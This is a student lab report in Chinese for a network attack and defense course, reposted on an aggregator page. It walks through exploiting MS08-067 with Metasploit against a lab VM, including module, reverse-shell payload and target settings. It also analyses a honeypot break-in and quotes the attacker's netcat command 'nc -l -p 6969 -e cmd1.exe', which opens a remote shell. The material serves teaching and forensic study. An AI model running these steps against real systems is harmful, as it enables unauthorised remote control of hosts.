当前位置: 首页 > news >正文

20253905 2025-2026-2 《网络攻防实践》实践六报告

20253905 2025-2026-2 《网络攻防实践》实践六报告

1.实践内容

2.实践过程

2.1 动手实践Metasploit windows attacker

  • 测试连通性
    image
    image
  • 在kali中输入命令sudo msfconsole进入Metasploit
    image
  • 输入命令search ms08-067查看漏洞
    image
  • 查看需要设置的参数
    image
  • show payloads显示可用的攻击负载,查看有效的攻击载荷
    image
    image
  • 输入use exploit/windows/smb/ms08_067_netapi使用相关攻击脚本,set payload generic/shell_reverse_tcp选择要用的攻击负载模块
    image
  • 输入命令set RHOST 192.168.32.131 设置要攻击的IP,输入命令set LHOET 192.168.32.64 设置本机
  • 再利用命令show options查看是否配置成功
    image
  • 输入命令exploit进行攻击,若出现会话连接则表示攻击成功。
    image
  • 一步验证攻击成功,利用命令ipconifg进行查看IP地址,通过下图可以看出,已经显示出靶机的IP地址
    image

2.2 取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程

  • 打开终端,进入文件所在目录,执行:wireshark snort-0204@0117.log
    image
  • 利用命令ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106进行过滤,通过下图可以看出,存在TCP连接和HTTP数据流。
    image
  • 在117HTTP数据包中可以看到有特殊字符%C0%AF,该字符在Unicode编码中对应符号/,进而可以分析得到为Unicode攻击。攻击者利用Unicode攻击访问boot.ini文件
    image
  • 在140数据包中可以发现攻击者想要获得msadcs.dll文件
    image
  • 在追踪到149数据包时,发现攻击者输入数据查询语句进行SQL注入攻击
    根据“ADM!ROX!YOUR!WORLD”特征字符串以及dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb的使用,可以推测出该攻击是由 msadc2.pl渗透攻击代码发起的
    image
  • 通过后续数据包可以看到攻击者曾尝试连接FTP服务,但是账号密码错误,被拒绝连接了
    image
  • 通过继续检查后面的数据包,发现攻击者成功建立了FTP连接
    image
  • 后面发现攻击者通过 nc构建其一个远程 shell 通道。然后利用命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe,使得攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。
    image
  • 已知攻击者连接的是6969端口,因此利用命令tcp.port == 6969进行过滤
  • 攻击者在连接后进行了一系列操作:
  • 看文件
    image
  • 删文件
    image
  • 看文本
    image
  • 看用户
    image
  • 写文本
    image
  • 试图建立创建rdisk
    image
  • 攻击者还试图通过拷贝删除har.txt的方式来提升自己的权限
    image
  • 防范 MS08-067 漏洞攻击:安装官方补丁;封堵关键端口;部署入侵检测系统 (IDS/IPS);升级操作系统。
  • 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
  • 答:是,攻击者自己承认了。
    image

2.3 windows系统远程渗透攻击和分析

  • 攻击方信息:kali,使用MS08-067 漏洞,ip地址为192.168.32.64,操作如下。
    image
    image
  • 攻击方创建文件夹
    image
  • 防守方追踪
    image

3.学习中遇到的问题及解决

  • 问题1:攻击机和靶机设置反导致无法攻击。
    image
  • 问题1解决方案:检查设置并更正。

4.实践总结

xxx xxx

http://www.jsqmd.com/news/699522/

相关文章:

  • WinUtil:10分钟学会Windows系统优化与软件批量安装的终极指南
  • VR-Reversal:无需VR设备,在普通屏幕上自由探索3D全景视频的5种专业方案
  • 从需求到上线:手把手教你用XMind和Notion打造动态可视化测试大纲
  • 量子计算中的离散时间晶体与Qudit原生框架
  • BetterNCM插件管理器完整指南:高效配置网易云音乐增强插件
  • 别再死记硬背了!用Node.js文件读写和Vue图片压缩,彻底搞懂JavaScript回调函数
  • 2026 年度中国预防近视机构推荐榜单:赵阳眼科引领下的近停视界与科学防控体系化服务双维度评估行业洞察 - 外贸老黄
  • PLIP终极指南:快速解析蛋白质-配体相互作用的完整方案
  • 5分钟掌握WinUtil:Windows终极系统优化与软件批量安装工具
  • STM32F407上CanFestival移植避坑全记录:从CubeMX工程到心跳报文收发
  • 威海市资深GEO搜索关键词优化代运营公司找哪家好 - 舒雯文化
  • 老笔记本升级内存条避坑全记录:从CPU-Z查参数到兼容性测试,手把手教你给旧电脑续命
  • 歌词滚动姬:3分钟学会制作专业LRC歌词的终极指南
  • 从零上手Airtest:图像识别与Poco控件双核驱动的UI自动化测试实战
  • 多项式逻辑回归原理与Python实践指南
  • 专栏B-产品心理学深度-00-专栏简介
  • 别再为多相机标定头疼了!VisionMaster三种坐标系统一方案深度对比与选型建议
  • Linux Bonding实战:从零到一构建高可用与高带宽网络链路
  • 如何快速掌握缠论自动分析:ChanlunX通达信插件终极指南
  • BetterNCM Installer:网易云音乐插件管理的终极自动化解决方案
  • 2026年华为云小白流程:OpenClaw如何安装?Coding Plan配置与大模型接入全解
  • 深度学习语义分割篇——DeepLabV1核心创新与实战解析
  • SAP FI顾问实战:手把手教你用OB13配置总账科目表(附T004表查询与避坑点)
  • 终极指南:三步快速上手DJI Cloud API实现无人机云服务集成 [特殊字符]
  • 大话适航(九)破局
  • 中石化加油卡回收靠谱平台推荐 - 京顺回收
  • 测试进阶:巧用Charles捕获Socket数据流,精准定位通信层Bug
  • CUDA 13 vs CUDA 12.8:5大AI训练场景吞吐量对比、显存带宽利用率曲线及3个必升理由
  • C#微服务间通信,除了gRPC和HTTP,别忘了Redis Pub/Sub这个轻量级选项(.NET 8实战)
  • Electron图标修改避坑指南:为什么你的图标在打包后不显示?(附解决方案)